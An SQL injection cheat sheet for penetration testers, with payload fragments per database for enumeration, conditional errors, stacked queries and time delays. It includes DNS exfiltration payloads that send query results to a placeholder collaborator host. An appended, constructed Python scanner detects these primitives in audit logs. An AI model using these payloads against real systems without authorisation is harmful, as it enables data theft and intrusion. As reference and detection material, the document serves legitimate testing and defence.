SQL injection cheat sheet

The SQL injection cheat sheet is a powerful tool for web application penetration tests. It follows a modular approach and can be used for various tasks: post-exploitation, database enumeration, data retrieval, etc.

String concatenation

on Jun 05, 2022
Oracle	'foo'||'bar'
Microsoft	'foo'+'bar'
PostgreSQL	'foo'||'bar'
MySQL	'foo' 'bar' [Note the space between the two strings]
MySQL	CONCAT('foo','bar')

Substring

on Jun 05, 2022
Oracle	SUBSTR('foobar', 4, 2)
Microsoft	SUBSTRING('foobar', 4, 2)
PostgreSQL	SUBSTRING('foobar', 4, 2)
MySQL	SUBSTRING('foobar', 4, 2)

Comments

on Jun 05, 2022
Oracle	--comment
Microsoft	--comment
Microsoft	/*comment*/
PostgreSQL	--comment
PostgreSQL	/*comment*/
MySQL	#comment
MySQL	-- comment [Note the space after the double dash]
MySQL	/*comment*/

Database version

on Jun 05, 2022
Oracle	SELECT banner FROM v$version
Oracle	SELECT version FROM v$instance
Microsoft	SELECT @@version
PostgreSQL	SELECT version()
MySQL	SELECT @@version

Database contents

on Jun 05, 2022
Oracle	SELECT * FROM all_tables
Oracle	SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
Microsoft	SELECT * FROM information_schema.tables
Microsoft	SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL	SELECT * FROM information_schema.tables
PostgreSQL	SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQL	SELECT * FROM information_schema.tables
MySQL	SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Conditional errors

on Jun 05, 2022
Oracle	SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
Microsoft	SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQL	SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQL	SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')

Batched (or stacked) queries

on Jun 05, 2022
Oracle	Does not support batched queries.
Microsoft	QUERY-1-HERE; QUERY-2-HERE
PostgreSQL	QUERY-1-HERE; QUERY-2-HERE
MySQL	QUERY-1-HERE; QUERY-2-HERE

Time delays

on May 06, 2022
Oracle	dbms_pipe.receive_message(('a'),10)
Microsoft	WAITFOR DELAY '0:0:10'
PostgreSQL	SELECT pg_sleep(10)
MySQL	SELECT sleep(10)

DNS lookup

on Jun 05, 2022
Oracle	The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:
Oracle	SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
Oracle	The following technique works on fully patched Oracle installations, but requires elevated privileges:
Oracle	SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')
Microsoft	exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
PostgreSQL	copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
MySQL	The following techniques work on Windows only:
MySQL	LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
MySQL	SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'

DNS lookup with data exfiltration

on Jun 05, 2022
Oracle	SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
Microsoft	declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')
PostgreSQL	create OR replace function f() returns void as $$
	declare c text;
	declare p text;
	begin
	SELECT into p (SELECT YOUR-QUERY-HERE);
	c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
	execute c;
	END;
	$$ language plpgsql security definer;
	SELECT f();
MySQL	The following technique works on Windows only:
MySQL	SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
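
Added example (not part of the original cheat sheet): a defender-side scanner that flags the primitives from the "Time delays" and "DNS lookup" tables when they show up in a database statement log. The log format, the sample lines and the function names are constructed for illustration.

```python
import re

# (category, DBMS, pattern) for the primitives listed in the "Time delays" and
# "DNS lookup" tables. Patterns are matched against lower-cased statements.
RULES = [(cat, db, re.compile(rx, re.S)) for cat, db, rx in [
    ("time-delay", "Oracle",     r"\bdbms_pipe\s*\.\s*receive_message\s*\("),
    ("time-delay", "Microsoft",  r"\bwaitfor\s+delay\b"),
    ("time-delay", "PostgreSQL", r"\bpg_sleep\s*\("),
    ("time-delay", "MySQL",      r"\bsleep\s*\("),
    ("dns-lookup", "Oracle",     r"\bxmltype\s*\(.*<!entity\b.*\bsystem\b"),
    ("dns-lookup", "Oracle",     r"\butl_inaddr\s*\.\s*get_host_address\s*\("),
    ("dns-lookup", "Microsoft",  r"\bxp_dirtree\b"),
    ("dns-lookup", "PostgreSQL", r"\bcopy\b.*\bto\s+program\b"),
    ("dns-lookup", "MySQL",      r"\b(load_file\s*\(|into\s+outfile)\s*'\\\\"),
]]
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Constructed sample log: "<timestamp> <db user> <statement>" per line.
SAMPLE_LOG = r"""
2022-06-05T10:00:01Z webapp SELECT name FROM products WHERE id = 7
2022-06-05T10:00:02Z webapp SELECT name FROM products WHERE id = 7; SELECT pg_sleep(10)
2022-06-05T10:00:03Z webapp SELECT 1; WAITFOR   DELAY '0:0:10'
2022-06-05T10:00:04Z webapp exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
2022-06-05T10:00:05Z report SELECT sleep_hours FROM shifts WHERE id = 3
"""

def normalize(sql):
    """Lower-case, replace /*...*/ comments with a space, collapse whitespace."""
    return " ".join(BLOCK_COMMENT.sub(" ", sql.lower()).split())

def classify(sql):
    """Return the sorted (category, DBMS) pairs whose pattern occurs in sql."""
    # Check the raw text too, so comment markers inside a string literal
    # cannot make normalize() delete the part that should be inspected.
    views = (sql.lower(), normalize(sql))
    return sorted({(c, d) for c, d, rx in RULES for v in views if rx.search(v)})

def scan(log_text):
    """Return (timestamp, user, hits) for every log line with a match."""
    findings = []
    for line in log_text.strip().splitlines():
        ts, user, sql = line.split(" ", 2)
        hits = classify(sql)
        if hits:
            findings.append((ts, user, hits))
    return findings

if __name__ == "__main__":
    for ts, user, hits in scan(SAMPLE_LOG):
        print(ts, user, hits)
```

Feed it statement text from the DBMS audit log; the patterns are heuristics and will also match legitimate administrative use of the same functions.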
